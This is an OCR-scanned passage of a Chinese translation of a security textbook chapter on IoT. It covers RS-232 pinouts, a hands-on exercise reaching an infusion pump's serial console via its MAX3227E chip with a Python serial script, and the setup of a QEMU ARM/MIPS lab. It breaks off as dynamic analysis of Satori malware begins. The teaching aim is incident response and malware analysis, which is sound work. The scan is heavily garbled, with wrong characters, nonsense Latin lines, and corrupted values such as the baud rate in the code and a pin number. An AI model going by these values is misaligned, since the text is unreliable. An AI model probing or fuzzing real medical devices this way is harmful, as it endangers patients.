建议 通过 串口 对 物 联 网 设备 进行 物理 访问 ， 原 因 有 以 下 几 点 。 
e 事故 啊 应 (Incident Response): 设备 受到 感染 , 需要 对 其 中 运行 的 恶意 软件 进 
行 分 析 ， 但 设备 已 经 被 勒索 软件 支持， 无 法 从 本 地 或 远程 控制 台 访 问 。 
e 渗透 测试 (Penetration Testing): 这 是 最 第 见 的 场景 ， 如 果 设 备 的 配置 不 够 安 
全 ， 通 过 物理 方式 访问 设备 的 控制 台 可 获得 对 设备 的 超级 用 户 访问 权限 。 
第 23 草 的 23.2 节 “ 串 行 接口 ”详细 解释 了 UART 等 串口 ， 甚 至 描述 了 JITAG 接 口 。 
本 章 重 点 描述 如 何 与 RS-232 串 口交 互 。RS-232 串 口 使 用 广泛 ， 可 通过 它 访问 很 多 物 


932 


第 V 部 分 物 联 网 


25.1.1 RS-232 概 述 


对 RS-232 串 口 的 讨论 主要 侧重 于 事故 啊 应 人 员 和 渗透 测试 人 员 如 何 与 其 进行 
交互 。 有 关 RS-232 的 更 全 面 讨 论 ， 请 参阅 本 章 的 “扩展 阅读 ” 

RS-232 有 过 自己 的 晶 盛 时 期 。 那 时 ，RS-232 是 个 人 计算 机 的 标准 通信 端口 。 但 
由 于 传输 速率 低 ， 加 上 其 他 一 些 因 素 ， 最 终 被 USB 技 术 取 代 。 但 在 物 联网 时 代 ， 
RS-232 仍 是 十 分 彰 用 的 通信 协议 ， 主 要 用 于 对 医疗 、 网 络 、 娱 乐 和 工业 设备 提供 控 
制 台 访问 。 

RS-232 可 以 同步 或 异步 地 有 友 送 或 接收 数据 ， 可 以 在 全 双 工 模式 下 运行 ， 双 回 并 
发 地 通过 电压 等 级 传输 数据 , 其 中 , 逻辑 1(mark) 的 范围 是 -15~_3 VDC, 而 逻辑 0(space) 
的 范围 是 +3~+15 VDC。 图 25-1 显 示 了 RS-232 波 形 的 一 个 典型 示例 ; 传输 始 于 开始 位 
(逻辑 0)， 此 后 是 LSB(Least Significant Bit， 最 低 有 效 位 ) 与 MSB(Most Significant Bit, 
最 高 有 效 位 ) 范 围 内 的 数据 ,最 后 是 用 于 指示 数据 结束 的 停止 位 (逻辑 1)。 也 可 通过 使 
用 或 丢弃 奇偶 校 验 位 (图 25-1 中 未 显示 ) 来 验证 数据 完整 性 。 最 后 是 波 特 率 , 它 度量 每 
秒 传输 的 位 数 (bps)。 常见 的 波 特 率 有 标准 的 9600、38 400、19 200、57 600 和 115 200 bps. 


LSB MSB 


mark(1) - 15 VDC 
Pol lal al al sl ol of 


space(0) +15 VDC 


25-1 RS-232 波 形 示例 
25.1.2 RS-232 引 脚 排列 


最 常见 的 RS-232 连 接 器 是 DB-9 和 DB-25。DB-9 是 物 联网 设备 最 常用 的 连接 器 ， 
本 章 将 重点 介绍 。 因 为 引 脚 排列 方式 是 基于 设备 分 类 定义 的 ， 因 此 在 详细 介绍 引 脚 
排列 方式 之 前 ， 必 须 理解 这 些 设备 的 分 类 方式 。 有 两 关 RS-232 设 备 : DTE(Data 
Terminal Equipment， 数 据 终 痕 设 备 ) 和 DCE(CData Circuit-terminating Equipment， 数 气 
电路 终端 设备 )。DTE 通 常用 于 计算 机 ， 而 DCE 通 常用 于 调制 解 调 器 。 但 调制 解 调 器 
在 今天 已 不 再 流行 。 因 此 ， 要 区 分 使 用 的 是 DCE 还 是 DTE， 最 佳 方式 是 测量 发 送 引 
脚 (在 DB-9 中 是 引 肢 3 或 引 脚 2) 的 电压 。 如 果 引 脚 3 的 电压 在 -15~—3 VDC 范 围 内 ， 则 
设备 是 DTE。 如 果 在 引 脚 25 处 测 得 的 电压 在 -15~-3 VDC 范 围 内 ， 则 设备 是 DCE。 

为 什么 必须 区 分 DCE 或 DTE 设 备 呢 ? 因 为 引 脚 排列 是 不 同 的 ， 如 图 25-2 所 示 。 
要 注意 引 脚 2 和 引 脚 3 的 区 别 ， 因 为 错误 的 连接 将 导致 与 串口 的 通信 异常 。 
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DTE 引 脚 排 列 
1 DCD Data Carrier Detect DC Data Carrier Detect 
2 RxD Receive Data Tx 
3 TxD Transmit Data Rx 
4 DTR Data Terminal Ready 


5 GND Ground (Signal) 
6 DSR Data Set Ready | 6|DTR |DataTerminalReady | 
7 RTS Request to Send 
8 CTS Clear to Send 
9 RI Ring Indicator | 9|RI [Ring Indicator 


图 25-2 DTE 和 DCE DB-9 引 脚 排列 


要 与 物 联网 设备 交互 ， 识 别 正 硝 的 引 脚 排列 全 天 重要 。 


25.1.3 练习 25-1: 排除 医疗 设备 的 RS-232 端 口 故障 


假设 这 样 一 个 场景 : 作为 一 名 事故 啊 应 人 员 ， 你 收 到 一 人 台 受 恶意 软件 感染 的 裔 
脉 注 射 采 。 你 的 任务 是 提取 内 部 运行 的 恶意 软件 。 但 当 你 将 串 行 电费 插入 设备 试图 
通过 控制 台 访 问 时 ， 你 没有 收 到 啊 应 ， 在 符 试 不 同 的 流 特 率 之 后 还 是 不 行 。 因 此 ， 
需要 进行 更 详细 的 分 析 。 下 面 是 处 理 此 类 场景 的 建议 步骤 。 请 记 住 ， 这 是 在 撰写 本 
书 时 针对 实际 医疗 设备 正在 进行 的 研究 ， 因 此 ， 我 们 重点 介绍 处 理 此 关 场 景 所 需 的 
知识 ， 而 不 讲述 解决 方案 的 完整 细 市 。 


第 一 步 是 花 些 时 间 理 解 正 在 处 理 的 便 件 和 串 行 协议 。 这 通 章 通过 拆 炙 设备， 识 
别 相关 的 心 片 组 , 并 在 互联 网 上 但 找 所 谓 的 数据 表 ( 基 本 上 就是 特定 设备 的 技术 规范 ) 
来 完成 。 在 数据 表 中 ， 需 要 伍 找 引 脚 排列 ( 换 句 话说 ， 引 肢 在 心 请 组 中 的 使 用 方式 )。 
本 练习 使 用 静脉 注射 泵 的 RS-232 电 路 板 。 图 25-3 显 示 了 设备 的 前 视图 ( 左 图 ) 和 电路 
板 的 前 视图 ( 右 图 )。 此 时 ， 你 对 电路 板 还 一 无 所 知 。 可 以 看 到 ， 它 有 一 个 RJ-45 连 接 
船 ， 该 连接 堪 通 利用 于 以 太 网 通信 ， 在 右 侧 ， 可 以 看 到 整个 电路 板 及 其 组 件 。 

AUR AUS ABE DT OU, KEAN AE BA ER PS ZA, ALA R ee BENE 
一 个 便宜 的 放大 镜 ， 束 可 以 方便 地 看 清心 片上 的 微小 编号。 此 后 ， 可 以 在 Google 上 
搜索 这 些 编 号 。 通 第 可 以 搜索 到 相关 便 件 的 大 量 信息 ， 比 如 是 SDRAM、 微 控制 磊 、 
FPGA(Field Programmable Gate Array, 现场 可 编程 门 阵列 ) 还 是 串 行 接口 (本 例 中 的 情 
形 )。 放 大 镜 最 好 配备 夹子 。 当 需要 在 印刷 电路 极 (Printed Circuit Board，PCB) 上 焊接 
元 件 时 尤其 如 此 。 为 了 保证 精确 ， 你 需要 腾 出 双手 。 图 25-4 中 ,借助 放大 镜 可 确定 
器 件 标识 是 Maxim MAX3227E. 
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图 25-4 借助 放大 镜 杏 看 设备 


在 互联 网 上 快速 搜索 ， 可 找到 数据 表 www.ti.comylit/ds/symlink/max3227e.pdf。 
阅读 “3-V TO 5.5-V SINGLE CHANNEL RS-232 LINE DRIVER/RECEIVER” 所 描述 
的 信息 ， 可 以 清楚 地 表明 已 经 找到 了 串口 ， 它 使 用 的 是 标准 RS-232 靖 口 ， 这 意味 着 
RJ-45 插 和 孔 不 用 于 以 太 网 通信 。 现 在 ， 病 起 一 杯 咖 啡 ,阅读 整个 规 AG. 你 必须 大 致 了 
解 该 设备 的 工作 方式 。 在 本 练习 中 ， 你 需要 找到 引 脚 排列 的 摘 述 信息 。 你 想 要 找到 
的 是 用 于 发 送 数 据 、 接 收 数据 以 及 接地 的 引 脚 。 


步骤 2: 设备 的 引 脚 排列 映射 


找到 数据 表 后 ， 你 需要 了 解 MAX3227E 的 引 脚 排 列 。 图 2$-5 显 示 了 数据 表 中 的 
引 脚 排列 图 。 
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DB 软件 包 
(顶部 视图 ) 


READY | | 1 16 | | FORCEOFF 
C1+ | | 2 15 | | Ve 
V+ | |3 14 | |GND 
C1- 13 | |DOUT 
C2+ | |5 12 | | FORCEON 
C2- | |6 11 | | DIN 
V-||7 10 | |INVALID 


RIN | | 8 9 | |ROUT 
图 25-5 MAX3227E 引 脚 排列 


这 个 数据 表 的 第 3 页 提供 了 引 脚 说 明 ， 我 们 感 兴趣 的 几 个 引 脚 如 下 。 

e GND(14): 接地 。 

e RIN(8): RS-232 接 收 器 输入 。 

e DOUT(13): RS-232 驱 动 器 输出 。 

现在 ， 你 已 经 知道 了 与 设备 交互 所 需 的 引 脚 。 下 面 制作 插 线 电 绕 。 你 需要 识别 
相应 的 RJ-45 引 脚 ， 通 彰 可 通过 电 绩 颜色 (而 非 引 脚 编号 ) 方 便 地 识别 。 为 此 ， 需 要 执 
行 下 列 步 又 : 

(1) 取 一 根 标准 的 网 线 (插入 计算 机 中 的 那 种 电缆 )， 将 其 切 开 ， 这 样 ， 你 便 可 以 
分 别处 理 每 条 线 。 

(2) 将 RJ-45 连 接 器 插入 嵌入 了 MAX3227E 芯 片 的 设备 中 。 

(3) 用 万 用 表 执 行 连接 测试 ， 如 下 所 示 。 

a. 转换 为 Continuity Test 模 式 ( 看 上 去 像 Wi-Fi 图 标 )。 

b. 连接 黑色 和 红色 的 测试 引线 ， 确 保 听 到 声音 。 

c. 在 放大 镜 的 帮助 下 ， 将 一 条 测试 引线 连接 到 MAX3227E 的 引 脚 14( 接 地 )。 

d. 用 第 二 条 测试 引线 尝试 连接 以 太 网 电 绕 的 每 条 线 ， 直 至 听 到 声音 为 止 。 记 下 
BANA. FEMA, ARNE A, (EAT AA 

e. 对 引 脚 8CQRIND 和 引 脚 13QDOUT) 重 复 以 上 过 程 。 

表 25-1 显 示 了 测量 结果 。 


表 25-1 测量 结 来 


MAX3227E 心 片 引 脚 RJ-45 线 
GND(8) Ali v fà 
RIN(8) FEE E 
DOUT(13) 白色 / 蓝 色 
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此 时 ， 已 经 准备 好 用 以 了 解 静脉 注射 和 RS-232 通 信 方 式 的 插 线 电缆 。 现 在 需要 
分 析 通 信 的 另 一 端 ， 即 PC 端 ，PC 端 使 用 DB-9 端 口 。 因 此 ， 只 需要 将 前 面 确定 的 线 
对 应 到 相应 的 DB-9 读 取 、 发 送 和 接地 引 脚 即 可 。 

回顾 一 下 ， 在 每 个 RS-232 通 信 中 ， 都 需要 区 分 DCE 和 DTE 组 件 。 因 此 ， 笔 记 本 
电脑 将 扮演 DTE 角 色 ， 而 静脉 注射 条 将 扮 涡 DCE 角 色 。 这 是 十 分 重要 的 ， 因 为 你 将 
使 用 DTE 引 脚 排列 (可 参见 图 2$-2)， 通 过 RJ-45 与 静脉 注射 泵 交互 。 表 25-2 列 出 了 最 
终 配 置 。 


表 25-2 RARE 


PC: RS-232(DTE) 静脉 注射 泵 : RJ-45 接 线 (DCE) 
GND(5) GND(8), 2018, 
RxD(2) RIN(8), Hi f&/tr& 
TxD(3) DOUT(13), AERE 


TOMA ARN TS, BURA A iC EE ie, YURI25-6RT A. 


“he 
p^ "m. "ls 


= yi 
en ai 


i ^ à k 


图 25-6 RS-232 连 接 的 最 终 设 置 
最 终 配 置 如 下 : 
静脉 注射 条 RS-232(MAX3227E) <> Jfk HA < RS-232(DB-9 £A EB: 23) 


DB-9 双 接口 ( 公 母 接口 ) 在 操作 中 十 分 吻 用 ， 因 为 它 人 允许 你 方便 地 操纵 每 条 线 。 
这 些 设备 被 称 为 DB-9 转 换 连 接 器 (connector breakoub， 这 款 转 换 连 接 器 可 在 很 多 硬 
件 商 店 中 买 到 ， 价 格 也 不 贯 (不 到 309$)。 


步骤 3: 与 静脉 注射 泵 的 串口 交互 
现在 检查 静脉 注射 泵 中 的 一 切 是 否 正 常 工作 。 为 此 ， 将 RS-232 PCB 放 回 医 疗 设 
备 中 ， 连 接 所 有 线路 ， 如 图 2$-6 所 示 。 使 用 一 条 “DB-9 公 头 -USB” 线 统 ， 插 入 笔记 
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本 电脑 。 可 在 图 25-7 中 看 到 最 终 设置 。 


" B & FP» @ 


图 25-7 “对 静脉 注射 泵 的 最 终 测试 


暂 不 司 用 静脉 注射 采 , 将 USB 电 级 插入 笔记 本 电脑 ， 司 动 VirtualBox 上 的 Ubuntu 
虚拟 机 (VMD) 读 取 串 口 。 选 择 菜 单 Devices | USB | FTDI FT232R USB UART [0600], 
将 USB 设 备 连接 到 虚拟 机 。 

设备 名 称 因 使 用 的 USB 而 异 ， 但 一 条 经 验 法 则 是 : 始终 在 列表 中 查找 之 前 未 见 

现在 执行 lsusb 命 令 ， 确 认 Ubuntu 已 识别 出 USB 设 备 。 输 出 应 当 显 示 你 在 上 一 步 
的 菜单 中 看 到 的 设备 ， 以 及 系统 中 己 经 识别 的 其 他 设备 。 下 面 举 一 个 例子 : 

XpLOiT:-$9 lsusb 

Bus 001 Device 004: ID 0403:6001 Future Technology Devices 

International, Ltd 

FT232 USB-Serial (UART) IC 


Bus 001 Device 002: ID 80ee:0021 VirtualBox USB Tablet 
Bus 001 Device 001: ID 1d6b:0001 Linux Foundation 1.1 root hub 


USB 设 备 已 经 连接 到 Ubuntu 并 可 通过 多 种 方式 与 其 交互 ， 具 体 方式 取决 于 正在 
使 用 的 客户 靖 。 以 下 是 识别 USB 的 三 种 方法 : 

@XpLOiT:~S ls /dev/ttyUSBO 

QXpLOiT:-^$ ls 

/dev/serial/by-path/pci-0000\:00\:06.0-usb-0\:2\:1.0-port0 

@XpLOiT:~$ ls 

/dev/serial/by-id/usb-FTDI FT232R USB UART A104WBLI-if00-port0 

似乎 生产 测试 所 十 的 一 切 都 设置 好 了 ，, ANA RE 138 f ic EC 
率 以 及 奇偶 校 验 位 和 停止 位 )。 有 三 种 方式 可 以 解决 这 个 问题 。 节 简易 的 方式 是 查阅 
相应 设备 的 技术 手册 ， 尝 试 查 找 这 些 参数 。 第 二 种 方式 是 采取 暴力 攻击 手段 ， 直 至 
获得 正确 的 值 。 由 于 可 用 的 波 特 率 在 5bps 左 右 ， 这 样 做 也 花 不 了 多 长 时 间 。 最 后 一 
种 方式 古 使 用 好 辑 分 析 融 。 可 将 逻辑 分 析 句 视 作 串口 的 咒 探 媳 。 它 确定 正在 友 壕 的 
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脉冲 ， 并 测量 “脉冲 之 间 的 频率 ”， 这 些 可 帮助 你 最 终 确 定 波 特 率 。 它 也 有 助 于 确定 
串口 的 发 送 和 接收 引 脚 (本 练习 中 就 是 这 样 )。 注 意 ，RJ-45 连 接 上 融 只 有 两 条 线 统 用 于 
此 目的 。 建 议 使 用 Saleae 人 逻辑 分 析 器 完成 该 任务 ,但 Saleae 人 逻辑 分 析 器 售 价 较 高 。 在 
这 个 练习 中 ， 使 用 逻辑 分 析 器 来 识别 参数 。 

下 面 创 建 一 个 简单 的 脚本 来 读 取 串口 , 看 一 下 能 获得 什么 。 为 此 , 可 使 用 Python 
的 serial 模 块 。 这 是 一 个 读 取 串口 的 例子 。 可 以 看 到 ， 我 们 正在 使 用 /dewttyUSB0 设 
备 与 端口 交互 ， 波 特 率 为 57 600bps， 这 是 通过 逻辑 分 析 器 获得 的 信息 。 


if | name == " main ^": 
port = '/dev/ttyUSBO' 
ser = serial.Serial (port, 


baudrate=97/600, 
bytesize-serial.EIGHTBITS, 
parity-serial.PARITY NONE, 
stopbits-serial.STOPBITS ONE, 
rtscts-False, 

dsrdtr-False, 

xonxoff-False, 

timeout-0, 

# Blocking writes 
writeTimeout=None) 


tlast = time.time() 
lined = False 
mysum = 0 


while True: 
c = ser.read(1) 
print binascii.hexlify(c) 

SITAE, Ja See NR, AREPA. BOR Ma, MITER SU » 
实际 上 ， 每 隅 两 秒 便 发 送 相同 的 数据 ， 看 上 去 像 心跳 或 同步 数据 。 这 表明 你 已 经 正 
确 识 别 了 接收 引 脚 。 在 图 25-8 中 ， 可 看 到 测试 像 刚才 解释 的 那样 运行 。 

发 送 引 脚 的 情况 如 何 呢 ?” 需 要 确认 是 任 可 发 送 数 据 并 得 到 啊 应 。 最 终 ， 如 末 想 
与 静脉 注射 俏 交 互 ， 就 必须 通过 串口 发 送 数 据 。 

要 上 友 送 数据 ， 需 要 使 用 以 下 代码 行 ， 还 要 将 接收 到 的 数据 发 回 静 脉 注射 条 。 看 
一 看 会 有 什么 不 同 的 结果 : 

ser.write ('\xfd\x00\x00\xfb\x7d\xfc') 

又 一 次 成 功 了 ! 在 图 25-9 中 可 以 看 到 ， 给 端口 发 送 一 些 字 节 后 ， 得 到 了 不 同 的 
lf x fd x90 x00 x8dxfex16), XA SPAS: 发 送 引 脚 在 正确 工作 ， 而 且 闹 脉 
注射 采 正 根据 不 同 的 有 友 送 数据 做 出 不 同 的 啊 应 。 
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ee by sudo python pump-sertal.py 


图 25-8 ”从 静脉 注射 条 的 串口 接收 数据 图 25-9 ”将 数据 传 给 静脉 注射 条 的 串口 


这 里 要 感谢 John McMaster 做 出 的 重要 页 献 ! 他 的 经 验 和 设备 都 无 比 宝 员 ,对 本 
练习 意义 重大 。 另 外 感谢 Zingbox 公 司 对 此 类 工作 的 支持 (主动 识别 医疗 设备 的 问题 ， 
并 与 受 感染 设备 的 供应 商 进 行 合作 )。 壮 憾 的 是 ， 因 为 这 项 研究 目前 还 在 进行 中 ， 这 
里 不 能 透露 更 多 细节 。 到 这 个 阶段 ， 你 应 该 了 解 到 串 行 数据 包 ， 并 能 利用 或 模糊 这 
些 数据 包 ， 看 看 能 否 得 到 非 预期 的 行为 。 如 果 对 该 设备 的 最 新 发 现 感 兴趣 ， 可 访问 
https://ics-cert.us-cert.gov/advisories/ICSMA-17-017-02A. 


252 ”建立 威胁 实验 室 


传统 的 恶意 软件 在 Windows 环 境 中 运行 ， 沙 箱 和 虚拟 机 等 工具 始终 透明 地 文 持 
这 些 系 统 。 但 在 处 理 物 联网 恶意 软件 时 ， 有 两 种 不 同 的 体系 结构 ， 都 未 获得 透明 文 
持 。 这 两 种 体系 结构 是 ARM 和 MIPS。 本 节 讨 论 在 “威胁 实验 室 ” 中 模拟 这 些 环境 
的 多 个 方案 。 下 面 简要 讨论 启动 和 运行 ARM 及 MIPS 系 统 的 不 同方 式 。 

e 使 用 QEMU(Quick Emulator): QEMU 是 开源 的 机 器 模拟 右 和 虚拟 器 。 这 是 模 
拟 ARM 和 MIPS 体 系 结构 的 最 常用 方法 ， 对 于 恶意 软件 分 析 非 常 方便 。 快 昭 
可 避免 硬盘 中 的 永久 性 更 改 。 

e 使 用 BeagleBone 或 Raspberry Pi 之 类 的 开 肥 平台: 里 然 这 不 是 分 析 恶 意 软 件 的 
推荐 方法 ， 但 有 时 ， 需 要 在 实际 环境 中 运行 恶意 软件 。 好 处 是 ， 需 要 时 这 些 
电路 板 总 是 可 以 重新 镜像 Geimage)。 

e 使 用 Cuckoo 等 沙 箱 : 可 定制 Cuckoo 以 运行 ARM 和 MIPS 系 统 。 实 际 上 ， 后台 
使 用 QEMU 进 行 模 拟 。 但 是 ， 得 到 的 结果 十 分 有 限 ， 获 得 的 细 市 远 不 如 在 
Linux 环 境 中 那么 多 ， 特 别 是 在 进程 执行 特征 方面 。 它 也 不 文 持 Volatility 
插件 。 无 论 如 何 ， 都 有 必要 感谢 Cuckoo 开 发 团队 所 做 的 工作 Chttps:Wlinux. 
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huntingmalware.com/). 


接 下 来 将 使 用 QEMU 进 行 模拟 ， 因 为 这 是 最 稳定 、 最 成 熟 的 模拟 平台 。 
25.2.1 ARM 和 MIPS 概 述 


在 开始 使 用 ARM 和 MIPS 前 , 先 简要 介绍 一 下 它们 的 体系 结构 和 工作 方式 . ARM 
和 MIPS 是 精简 指令 集 计 算 机 (Reduced Instruction Set Computers, RISC), 它们 的 指令 
集体 系 结构 (Instruction Set Architectures，ISA) 有 具有 一 组 特性 ， 使 得 它们 具有 较 低 的 
指令 周期 (Cycles Per Instruction，CPD 和 工作 电压 。 这 减少 了 能 耗 ， 人 允许 这 些 体系 结 
构 在 小 型 的 设备 ( 即 嵌入 式 设备 ) 上 运行 ， 例 如 具有 Wi-Fi 功 能 的 腕 带 或 具有 蓝牙 连接 
能 力 的 戒指 。 这 种 体系 结构 不 同 于 日 党 的 Windows 和 macOS 笔 记 本 电脑 中 的 x86 处 理 
局 使 用 的 复杂 指令 集 计 算 (Complex Instruction Set Computing，CISC)。RISC 体 系 结 
构 支 持 32 位 和 64 位 版 本 。 

ARM 提 供 了 一 个 名 为 Thumb 的 16 位 指令 集 ， 这 基本 上 是 32 位 指令 集 的 压缩 形 
式 ; Thumb 可 实时 解压 缩 ， 人 允许 缩减 代码 大 小 ， 从 而 直接 改善 应 用 程序 性 能 。 

这 两 种 体系 结构 通常 用 于 游戏 机 (如 任天堂 和 PlayStation 的 产品 ) 以 及 网 络 设备 
(如 路 由 需 和 住宅 网 关 )， 但 它们 之 间 有 一 个 重要 区 列 : ARM 体 系 结构 是 移动 设备 的 
首选 ， 在 诸如 BeasgleBone 和 Raspberry Pi 的 开发 板 中 最 音 用 。 

二 进 制 文件 以 ELF Linux 二 进 制 格式 打包 , 二 进 制 文件 头 描述 了 机 器 和 对 象 文 件 
类 型 。 图 25-10 显 示 了 ELF 文 件 头 。 要 全 面 了 解 整个 结构 ， 可 参阅 本 章 的 “扩展 阅读 ， 
中 对 CMU 的 详细 描述 。 

#define EI NIDENT 16 


typedef struct { 


unsigned char e ident[EI NIDENT]; 


Elf32 Half e type; 
E1f32 Half e machine; 
Elf32 Word e version; 
Elf32 Addr e entry; 
Elf32 Off e phoff; 
Elf32 Off e shoff; 
Elf32 Word e flags; 
Elf32 Half e ehsize; 
Elf32 Half e phentsize; 
Elf32 Half e phnum; 
Elf32 Half e shentsize; 
Elf32 Half e shnum; 
Elf32 Half e shstrndx; 


} Elf32 Ehdr; 


图 25-10 ELF 文 件 头 
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得 看 文件 头 可 知 ，e_ident 成 员 (共有 16 个 字 蔬 ) 的 前 4 个 字 节 表示 “魔法 字 节 7” 
\x7F\x45\x4c\x46, 在 体系 结构 中 , 这 个 数字 始终 不 变 。 a ye 节 之 后 ,e -typeQ 
3^ 1)flle machine Ti) Sis EERI RR. UVR ELF 2, CX 
anuo geo 对 于 ARM 是 0x28， 对 于 MIPS 是 0x08。 在 图 25-11 中 ， 
可 以 清楚 地 看 到 这 一 点 。 如 果 查 看 偏 移 16( 十 六 进 制 为 0x10)， 可 找到 刚才 描述 的 
字段 。 


hexdump -C armel |head -n 
Tf 4c 


hexdump -C mips-lsb |head -n 
Tf 4c 


图 25-11 ELEF 头 机 器 标识 


另外 必须 理解 , 这 些 体系 结构 可 文 持 不 同 的 指令 集 。 例如 , ARMEL 文 持 ARMv4 
TAERA ARMHF 文 持 ARMv7 平 台 (用 于 最 新 技术 )。 要 正确 执行 二 进 
制 文 件 , 字 节 有 顺序 (Endianness) 也 十 分 重要 ，MIPS 文 持 高 位 优先 字 节 序 (Big-Endian)， 
而 MISEI 支 持 低位 优先 字 节 序 (Litle Endian 

后 面 将 详细 介绍 这 些 体系 结构 ， 分 析 其 内 部 工作 方式 。 


25.2.2 ”实验 25-1; 使 用 QEMU 设 置 系统 


要 执行 这 个 实验 中 的 步骤 ， 需 要 满足 以 下 要 求 。 
e 物理 PC: 在 本 实验 中 称 为 P-PC， 这 可 以 是 将 要 安装 VirtualBox 的 Windows、 
Linux 或 macOS 机 堪 。 
e VirtualBox 上 的 Ubuntu 16.04: 在 本 实验 中 称 为 Ubuntu-VM， 这 是 安 疼 QEMU 
以 模拟 物 联 网 设备 的 机 器 。 
e QEMU ARMMIPS: 在 本 实验 中 称 为 QEMU-Guest, 这 些 是 模拟 ARM 和 MIPS 
DEEL ae o 
e VNC% Pim: 在 REMU-Guest 局 动 期 间 ， 用 于 连接 到 Ubuntu-VM( 可 选 )。 
互联 网 上 有 多 个 站 点 描述 了 局 动 、 运 行 ARM 和 MIPS 的 方法 。 在 经 过 多 次 符 试 
Jn. 3&4 Ehttps://people.debian.org/907Eaurel32/qemu/ ERIN Y ARMAIMIPSTAS fil EL Mz 
拟 机 镜像 库 ( 感 谢 Aurelien Jarno 上 传 的 资料 )。 
可 在 图 25- ae. 多 个 目录 表示 文 持 的 体系 结构 ,每 个 目录 中 
包含 所 有 需要 的 文件 和 命令 
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Index of /~aurel32/qemu 


Name Last modified Size Description 
- Parent Directory - 
amd6 4 / 2014-01-06 18:29 - 
armel/ 2014-01-06 18:29 - 
armht / 2014-01-06 18:29 一 
E 1386/ 2014-01-06 18:29 - 
kfreebsd-amd64/ 2014-01-06 18:29 - 
kfreebsd-i386/ 2014-01-06 18:29 - 
mips/ 2015-03-15 19:07 - 
mipsel/ 2014-06-22 09:55 - 
C powerpc/ 2014-01-06 18:29 - 
sh4/ 2014-01-06 18:29 - 
sparc/ 2014-01-06 18:29 - 


图 25-12 QEMU VM 存储 库 


将 wheezy 发 布 的 所 有 二 进 制 文件 从 armel 目 录 下 载 到 Ubuntu-VM 中 。 此 外 ， 请 确 
保 以 桥接 (bridge) 模 式 配 置 Ubuntu-VM。 


注意 : armel 和 armhf 的 主要 区 别 在 于 支持 的 ARM 版 本 : armel 支 持 较 旧版 本 ， 
在 处 理 遗 留 系统 时 十 分 有 用 。 


现在 执行 以 下 命令 来 启动 ARM 系 统 : 


qemu-system-arm -M versatilepb -kernel vmlinuz-3.2.0-4-versatile 

-initrd initrd.img-3.2.0-4-versatile -hda 

debian wheezy armel standard.qcow2 -append "root-/dev/sdal" 

-monitor stdio -vnc 192.168.1.200:1 -redir tcp:6666::22 

monitor 选 项 提供 了 QEMU shell, LAE E; QEMU-Guest2 A; 这 样 ， 可 在 过 到 故 
障 时 关闭 机 堪 。 我 们 还 添 加 了 vnc 选 项 ， 以 提供 Ubuntu-VM 的 卫 地 址 。 默 认 情 况 下 ， 
在 端口 3901 上 生成 VNC 服 务 器 。 需 要 使 用 VNC 客 户 端 访问 而 不 需要 凭据 ， 不过， 也 
可 通过 QEMU shell 设 置 凭据 。 这 可 用 于 观察 局 动 过 程 ， 并 检测 这 个 阶段 发 生 的 任何 
问题 。 最 后 ， 使 用 redir 选 项 ， 从 Ubuntu-VM， 通 过 SSH 连 接 到 QEMU-Guest。 这 是 通 
过 交口 重 定 同 完 成 的 。 黑 认 情 况 下 ， 会 将 QEMU-Guest 配 置 为 NAI 设 备 ， 不 允许 直 
接 访 问 。 因 此 ， 需 要 连接 到 Ubuntu-VM 上 的 本 地 端口 6666， 此 后 被 重 定向 到 端口 
22(SSHJ 上 的 QEMU-Guest 机 器 。 下 面 是 要 使 用 的 命令 : 


ssh -p 6666 root@localhost 


机 器 的 默认 用 户 名 和 密码 都 是 root。 图 25-13 显 示 ARMEL 系 统 已 经 启动 , RNE 
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经 登录 到 系统 。 


192.168.1.200:5901 (QEMU) - VNC Viewer 
Debian GNU/Linux 7 debian-armel tty1 


debian-armel login: root 

Password: 

Last login: Mon Dec 11 23:14:18 UTC 2017 from 10. u-— an Maid g 
Linux debian-armel 3.2.0-4-versatile #1 Debian 3.2 


; included with the Debian GNU/Linux 
the ex ea m tribution terms for each program are described - in the 
Individual Tiles in /usr/share/dac/ x/copuright. 


Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent 
jermitted bu applicable law. 

roota@debian-armel:”# uname -a 

Linux deblan-armel 3.2.0-4-versatile #1 Debian 3.2.51-1 armwv5tejl GNU/Linux 
roota@debian-armel:# 


图 25-13 ”通过 VNC 客 户 端 观察 启动 过 程 


现在 安装 进行 恶意 软件 分 析 时 需要 的 所 有 工具 。 

e GDBServer: 允许 执行 远程 调试 。 

e Tcpdump: 允许 捕获 网 络 流量 。 

e Strace: 人 允许 在 执行 恶意 软件 期 间 记 录 系 统 调 用 (syscall)。 
在 继续 之 前 ， 必 须 运 行 以 下 命令 来 更 新 系统 


root@debian-armel:~#apt-get update 


注意 ， 这 些 预 置 镜像 总 是 抛 出 以 下 错误 ; 


W: There is no public key available for the following key IDs: 


9D6DS8F6BC85/C906 


W: There is no public key available for the following key IDs: 


7038D0442B90D010 


W: There is no public key available for the following key IDs: 


7638D0442B90D010 
可 执行 以 下 命令 来 加 以 修复 : 


root@debian-armel:~# apt-get install debian-keyring 
debian-archive-keyring 


现在 再 次 执行 update 命 令 ， 这 应 当 是 可 行 的 。 最 后 ， 按 如 下 方式 安装 所 需 的 工具 : 


root@debian-armel:~# apt-get install gdb tcpdump strace 


ZUR NATAL AA, WA De RES. KEARSE RIA. BY 
参阅 实验 252 以 了 解 细节 ， 注意 ， 也 可 以 遵循 相同 的 过 程 ， 通 过 QEMU 运 行 其 他 体 
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系 结构 (如 MIPS)。 只 需要 从 存储 库 下 载 适当 的 文件 即 可 。 
25.3 ”动态 分 析 物 联网 恶意 软件 


如 前 所 述 ， 可 采用 多 种 方式 ， 在 受 监测 的 环境 中 执行 基于 Windows 的 恶意 软件 
以 动态 获得 特征 .Cuckoo Sandbox 和 Payload Security 解 决 方案 是 两 个 例子 .但 在 ARM 
或 MIPS 上 执行 动态 分 析 时 ， 仍 然 没 有 可 徘 的 解决 方案 ， 人 至 少 没 有 人 免费 的 解决 方案 。 
因此 ， 我 们 需要 创建 目 己 的 环境 。 实 验 25-2 将 详细 介绍 复制 物 联 网 恶意 软件 Satori， 
并 提取 基于 网 络 和 基于 主机 的 特征 的 步 又 。 


25.3.1 ”实验 25-2: 动态 分 析 恶 意 软 件 


在 开始 前 要 声明 一 点 ， 我 们 将 使 用 实际 的 恶意 软件 。 因 此 ， 强 烈 建 议 在 虚拟 环 
境 中 运行 它 ， 与 公司 网 络 或 家 姓 网 络 完全 隔离 。 男 外 ， 务 必 拒 绝 从 guest 虚 拟 机 传 入 
主机 的 任何 入 站 通信 。 

本 实验 中 使 用 的 示例 MD5 是 ad52832a507cede6521el11556f7cbb95。 

